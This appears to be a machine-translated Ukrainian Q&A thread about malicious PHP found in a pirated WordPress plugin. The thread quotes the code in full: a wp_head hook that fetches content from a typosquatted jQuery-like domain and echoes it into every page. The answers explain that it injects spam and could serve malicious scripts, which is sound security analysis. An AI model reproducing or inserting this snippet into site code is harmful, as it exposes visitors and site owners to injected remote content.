Я знайшов це в плагіні. Що це робить? це небезпечно?

17

Я знайшов це в плагіні. Що це робить? це небезпечно?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
Софія Роза
джерело
5
Який плагін це?
Даніель
Ви отримали плагін з офіційного сайту WP?
Той бразильський хлопець
1
Це було в плагіні, один з моїх клієнтів хотів, щоб я працював у моїй мережі. Плагін хотів запустити це в wp-admin. Прочитавши це, я запитав його, звідки він походить. Це скасований плагін від торрента. Коротка відповідь була нічим не xXx
Софія Роза

Відповіді:

16

Він завантажує блок розмітки, що містить спам (я думав про публікацію трохи джерела, але я не хочу рекламувати вміст жодним чином) з домену, який є близьким неправильним написанням домену-- http://jquery.com/- використовується jQuery , поважна і популярна бібліотека Javascript та бібліотека, яку WordPress включає в Core. Я думаю, що ідея полягає в тому, щоб завантажувати цю бібліотеку, фактично завантажуючи щось зовсім інше.

І це полягає в тому, що, як видається, завантажується jQuery. Зауважте ім'я змінної $jquery.

Він також може спробувати завантажити шкідливі сценарії. Я не перевіряв. Я б точно назвав це небезпечним, тим більше, що вміст на цій сторінці може змінитись у будь-який час, коли контролери домену відчують це.

У кращому випадку це зашкодить вашому сайту, оскільки пошукові системи дивляться на сайти, які поширюють спам.

Не використовуйте його. Це не робить нічого корисного ні для вас, ні для когось іншого в Інтернеті, крім людей, які керують сайтом. Якщо ви знайшли це на авторитетному сайті, повідомте про це їм.

s_ha_dum
джерело
7

Так, це небезпечний код, завантаження вмісту зі спам-сайту.

Ви не назвали плагін, але якщо ви знайшли цей код після його встановлення на вашому веб-сайті, можливо, код плагіна не надходив від розробника, як це, а натомість був зламаний після його встановлення. У такому випадку ви можете знайти зловмисний код на більшості веб-сайтів, ніж лише цей плагін.

Перевірте завантажений код плагіна, де б ви не отримали плагін, і перевірте, чи був цей шкідливий код спочатку. Якщо ні, то ваш сайт зламали. Якщо ви визначите це так, прочитайте цю статтю з Кодексу .

Бен Міллер - Відновлення Моніки
джерело
3
Це було в плагіні, один з моїх клієнтів хотів, щоб я працював у моїй мережі. Плагін хотів запустити це в wp-admin. Прочитавши це, я запитав його, звідки він походить. Це скасований плагін від торрента. Коротка відповідь була нічим не xXx
Софія Роза
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.